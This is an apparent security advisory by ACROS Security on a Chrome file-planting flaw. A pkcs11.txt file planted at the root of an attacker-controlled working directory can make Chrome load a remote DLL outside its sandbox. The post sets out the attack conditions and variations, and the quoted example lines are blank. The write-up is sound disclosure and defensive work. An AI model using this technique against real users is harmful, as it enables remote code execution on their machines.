Bug allows remote code execution in Chrome
In September ACROS Security notified Google about a peculiar behavior of the Chrome browser that can be exploited for execution of remote code outside Chrome sandbox under specific conditions. It is another case of file planting, where an application loads a data file (as opposed to binary file, leading to binary planting) from the current working directory. Similarly to our previously reported file planting in Java Runtime Environment (still there in current build 1.6.0_29 if you want to play with it), Chrome loads a data file, namely pkcs11.txt, from the root of the current working directory and in case the file exists, parses and processes its content. Security-wise, the most interesting value in a pkcs11.txt file is called library. Consider the following line in pkcs11.txt:
This line will instruct Chrome to load library c:\temp\malicious.dll. To allow remote code execution attacks, it works with remote shared folders too; in our demonstration, the following line is used:
In addition, the library file doesn’t have to have a known extension (such as “.dll”), which makes it harder to block it on a firewall.
Finally, Chrome sandbox doesn’t provide any protection here as the entire process of loading pkcs11.txt and the associated library is done by the parent chrome.exe process.
HTTPS, NSS And pkcs11.txt
Chrome loads “/pkcs11.txt” the first time it needs to do anything encryption-related, which in most cases means visiting an HTTPS URL. Chrome developers tracked this issue to one of Mozilla’s Network Security Services (NSS) libraries, and it seems that it is a matter of unfortunate circumstances that gave life to this bug in Chrome, although the same bug may potentially exist in some other products integrating NSS libraries.
If you carefully read the previous paragraph, you noticed two things:
1. Chrome loads pkcs11.txt the first time it needs PKCS #11 capabilities, and it never does it again until re-launched. This means that if the user has already visited an HTTPS address before, or any of the sites he visited has loaded an image or any other data via HTTPS, the attack opportunity is gone. What makes things worse for the attacker is the fact that when Google is the selected search engine – and it is by default -, Chrome sends a request to . to determine your local Google domain immediately upon startup. This triggers the loading of pkcs11.txt from the root of user’s local system drive and closes the attacker’s window of opportunity before it was ever really opened.
2. The initial forward slash in the file name “/pkcs11.txt” means that pkcs11.txt will be loaded from the root of the current working directory, and not from the current working directory. For instance, if current working directory is C:\users\james\, Chrome will try to load C:\pkcs11.txt. In a shared folder case, if current working directory is \\server\share\somefolder\, Chrome will try to load \\server\share\pkcs11.txt.
So how can this vulnerability be exploited? Three conditions need to be met:
Google must not be the selected search engine. This setting is configurable under the Options page, and users can set Yahoo, Bing, or any other search provider as their selected search engine. We confirmed that Yahoo and Bing don’t send any HTTPS requests when Chrome is launched and are therefore suitable for mounting the attack.
User must not have visited any HTTPS resources before the attack. As described above, the attack relies on the fact that the NSS capabilities have not been initialized yet in the running parent Chrome process. Ideally for the attacker, the user would have just launched Chrome and not visit any web sites that send HTTPS requests.
Chrome’s current working directory must be set to attacker-controlled location. Since Chrome sets its current working directory to its own folder on user’s machine upon startup, double-clicking on HTML file in a remote shared folder (which often works for binary planting attacks) wouldn’t achieve anything for the attacker. The best remaining way we know of to set the current working directory in Chrome are then the file browse dialogs. If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder opened in the “Open” dialog, Chrome would load pkcs11.txt from the root of attacker’s network share and load the library specified in it.
We have prepared an on-line demonstration here. Simply open this page with Chrome and follow instructions. If you don’t have Chrome handy and want to see what would happen if you did, here’s a video of this demonstration:
Attack improvements and variations
Our demonstration requires you to wait until the count-down reaches 0 before the attack is completed and the remote DLL is loaded. The reason for this waiting is to make sure the “Open” dialog has successfully loaded the remote shared folder – which can take anywhere from 5 to 30 seconds according to our tests. A real attack would not keep you waiting: the attacker-controlled server could detect the incoming requests (SMB or WebDAV) indicating that Chrome’s current working directory has been set to its network share and then instruct the web page already loaded in Chrome to make some HTTPS request – which would result in Chrome loading pkcs11.txt from attacker’s network share just like in our demonstration.
Current working directory can also be set via the “Save As…” dialog and any other file browse dialog the attacker feels her victim would most likely be duped into opening.
A bizarre local variant of this same exploit is also possible in the extremely unlikely case that the user has his Downloads folder in the root of any one of his local drives. In that case, all the attacker would have to do is get a malicious pkcs11.txt downloaded in user’s Chrome (which can happen in a drive-by fashion as .txt is not a “dangerous” extension) and wait for the user to open the “Save As…” dialog, which by default opens the Downloads folder’s location.
Is this a vulnerability or not?
Google decided that this was not a vulnerability, but rather a “strange behavior that [they] should consider changing”. The reason they provided was that “the social engineering level involved here is significantly higher than ‘Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'”
This is actually hard to dispute. From an attacker’s perspective, given these two attack options, she would probably be more successful with the “fake anti-virus” one than the “file planting” one. However, the “fake anti-virus” option may not work against corporate users whose firewalls are likely to prevent them from downloading an executable, and who may not be technically allowed (e.g., with AppLocker) to launch unauthorized executables. Additionally, employees who attended at least one security awareness session could be more suspicious about a “please download and execute this” than an “open a file from this folder” request. Then again, they may not be, who knows.
Regardless, as security researchers we consider any “feature” that allows silent downloading of remote code and its execution on user’s computer without warnings a vulnerability. Clearly the same criteria cannot apply to Joe Average and someone working at a nuclear power plant, and it’s not a big deal if Google doesn’t share our vulnerability criteria (security experts disagree on many things all the time), but Google’s reasoning opens up an interesting and important question: how much social engineering is too much?
Microsoft’s Security Intelligence Report Volume 11 reveals (based on Microsoft’s data) that 88% of attacks in the first half of 2011 were depending on what they call “user interaction” and “feature abuse”, both of which are part of what is generally considered “social engineering,” i.e., getting users to do something they otherwise wouldn’t. While this doesn’t answer the above question, it sheds some light on how prevalent, and successful, social engineering seems to be in the real attacks out there. It seems plausible that as technical security countermeasures block more and more attack paths, attackers will be looking for the remaining paths of least resistance: both technical resistance and social one.
What can we learn?
1. Loading data files from untrusted locations can be dangerous, and this includes current working directory. Action item: fire up Process Monitor while testing your applications and see what they’re loading.
2. 3rd party libraries can introduce vulnerabilities into your software, and possibly only into your software. Action item: use 3rd party libraries whose developers are quick in fixing or at least which you can patch yourself. (The NSS library with this particular bug fortunately has both of these properties.)
3. What is a vulnerability to some, can be just strange behavior to others, and there’s no industry criteria for telling who’s right. (Although we can probably agree that the actual attacker is always right.) Action item for the issue described in this post: Make sure your Chrome home page is an HTTPS address or loads at least one HTTPS resource, and you won’t have to care who’s right.
Author: Mitja Kolsek, CEO of ACROS Security.